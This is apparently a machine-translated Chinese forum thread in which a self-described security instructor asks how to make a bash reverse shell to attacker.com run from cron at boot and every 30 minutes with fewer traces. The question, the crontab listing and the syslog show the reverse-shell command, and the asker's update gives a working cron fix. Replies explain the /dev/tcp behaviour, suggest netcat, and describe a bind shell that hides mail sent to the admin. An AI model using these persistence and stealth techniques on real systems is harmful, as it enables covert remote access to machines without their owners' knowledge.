我在一所大学教网络安全,正在写一个关于Netcat和Reverse Shell的实验。我已经创建了一个cron作业,它运行一个连接到我的侦听器的脚本。这样就行了。问题是有太多的指纹,脚本可以删除。实验室的一部分是关于隐形操作的(比如在输入的任何命令前面放一个空格)。
我正在尝试执行此命令。现在的频率并不重要,但最终它将运行在 Boot 和每30分钟。
/bin/bash -i >& /dev/tcp/attacker.com/5326 0>&1
当从命令行运行时,命令工作并建立反向shell。我不想使用端口80,因为如果学生决定尝试一些愚蠢的事情,我 * 确实 * 希望这个被阻止。另外,下一个实验将讨论iptables如何阻止此端口。
我试过引用。我试过sudo。最后是两个&。最后是一个“和”。对/tcp/路径的进一步限定。我不认为我需要建立什么tty会话它的运行(这将是坚韧的)。cron-run命令在任何情况下都不会成功。
crontab -l
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
# For more information see the manual pages of crontab(5) and cron(8)
#
# m h dom mon dow command
* * * * * /bin/bash -i >& /dev/tcp/attacker.com/5326 0>&1
下面是系统日志
cat /var/log/syslog
Mar 19 07:42:01 raspberrypi CRON[12921]: (pi) CMD (/bin/bash -i >& /dev/tcp/attacker.com/5326 0>&1)
Mar 19 07:42:01 raspberrypi CRON[12917]: (CRON) info (No MTA installed, discarding output)
它看起来没有失灵...就是不管用
所以,对于许多比我聪明的人来说,我做错了什么,我如何让这个命令作为一个cron作业工作(调用脚本不是一个选项)?
**更新:**解决方案是* * * * * /bin/bash -c 'bash -i >& /dev/tcp/attacker.com/5326 0>&1'
,尽管有两个错误,我仍在解决。
3条答案
按热度按时间sczxawaw1#
/dev/tcp
反病毒请注意,*
/dev/tcp/host/port
* 是一个**主义 *!cron
不会理解他们!您可以尝试:
或者使用非bash方式:
使用
netcat
作为示例:(See
man nc.traditional
与man nc.openbsd
)b0zn9rqh2#
我怀疑从命令行传递的argv数组中的内容与来自cron守护进程的内容不匹配。虽然我不能告诉什么是失踪的逃避,这里是一个一般的方法来诊断它:
如果你把它编译成一个二进制文件,并在两种情况下用args运行它,你应该看到区别:
对比:
如果这不是argv中的区别,那么
>&
和0>&1
是否不会被命令行bash进程(而不是正在启动的进程)处理并应用于正在运行的bash shell,从而使攻击者二进制文件没有重定向,但其父进程有?编辑:
F. Hauri提出了一个很好的观点,但你可能想要在你的crotab是:
(or他们可以编辑他们的答案,/path/a.out部分是错误的)
编辑2-捕获输出:
fcipmucu3#
这个简单的一行程序每分钟打开一个netcat bind shell,并将所有发送给管理员的邮件静音。